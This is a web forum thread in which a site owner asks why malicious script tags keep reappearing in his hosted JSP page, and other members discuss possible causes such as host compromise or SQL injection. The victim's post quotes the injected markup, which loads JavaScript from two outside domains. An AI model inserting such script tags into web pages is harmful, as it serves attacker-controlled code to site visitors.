• Post Reply
  • Bookmark Topic Watch Topic
  • New Topic

Malware inserted into my JSP?

 
Luca Carletti
Greenhorn
Posts: 16
  • Mark post as helpful
  • send pies
  • Quote
  • Report post to moderator
Hello,

I have publisched a site in a hosty server.

Recently i have discove that in my index.jsp page there is a malware code:

<html><body><script type="text/javascript" src="http://rafalpasko.hekko.pl/minijtools.js"></script><script type="text/javascript" src="http://tasavang.com/jtoolsmini.js"></script></body></html>

I have cleaner the code, but periodically the malware code reappear....

I don't know how that is possible...

anybody know a method to stop that???

Thank you and excuse for my terrible english...
 
Paul Clapham
Sheriff
Pie
Posts: 20971
31
Eclipse IDE Firefox Browser MySQL Database
  • Mark post as helpful
  • send pies
  • Quote
  • Report post to moderator
So somebody is getting connected to the place where your code is hosted and changing your code? You should discuss the security of your code with your hosting company, then.
 
Luca Carletti
Greenhorn
Posts: 16
  • Mark post as helpful
  • send pies
  • Quote
  • Report post to moderator
my hosting company say that depend by sql injection, but i don't know how that can modify my code...
 
Paul Clapham
Sheriff
Pie
Posts: 20971
31
Eclipse IDE Firefox Browser MySQL Database
  • Mark post as helpful
  • send pies
  • Quote
  • Report post to moderator
They could be right, I suppose. Your code could be vulnerable to SQL injection attacks. Or on the other hand, they might be saying that with no knowledge of your code.

However everybody else in the world is in the same position -- you are the only one who knows anything about your code.
 
Bear Bibeault
Author and ninkuma
Marshal
Pie
Posts: 64715
86
IntelliJ IDE Java jQuery Mac Mac OS X
  • Mark post as helpful
  • send pies
  • Quote
  • Report post to moderator
I don't see how SQL injection can insert text into a JSP on the file system. I assume that these JSP templates are not stored in the database?

Also, please avoid single-word subjects -- I have adjusted yours to something more appropriate as an example.
 
Jimmy Clark
Ranch Hand
Posts: 2187
  • Mark post as helpful
  • send pies
  • Quote
  • Report post to moderator
anybody know a method to stop that???


Sure, you either switch to a different hosting company or build your own web server and host web sites yourself.
 
Luca Carletti
Greenhorn
Posts: 16
  • Mark post as helpful
  • send pies
  • Quote
  • Report post to moderator
Thank you for reply,

build my own host web sites is a good idea!!!

can you give me some indication for build my own web server and host web sites???

Can you post me some link taht to explain how to do???




 
Ulf Dittmer
Rancher
Posts: 42967
73
  • Mark post as helpful
  • send pies
  • Quote
  • Report post to moderator
Are you talking about a file that's stored on your host? Or is this about an HTML page that arrives in your browser?

If the former, then you have definitely issues with your hosting provider and should switch, or at least get security straightened out.

If the latter, then it may well be that the code is inserted en route by a network provider - yours, or an upstream one.
 
Bear Bibeault
Author and ninkuma
Marshal
Pie
Posts: 64715
86
IntelliJ IDE Java jQuery Mac Mac OS X
  • Likes 1
  • Mark post as helpful
  • send pies
  • Quote
  • Report post to moderator
Luca Carletti wrote:build my own host web sites is a good idea!!!

Actually, it's not. If you have no idea what you are doing, you're site will be even less secure than it is now. The answer is to find a hosting provider that knows what they are doing.
 
Karim Kiswarday
Ranch Hand
Posts: 50
Eclipse IDE Java PHP
  • Mark post as helpful
  • send pies
  • Quote
  • Report post to moderator
Luca Carletti wrote:my hosting company say that ...


What's your host company name?
 
  • Post Reply
  • Bookmark Topic Watch Topic
  • New Topic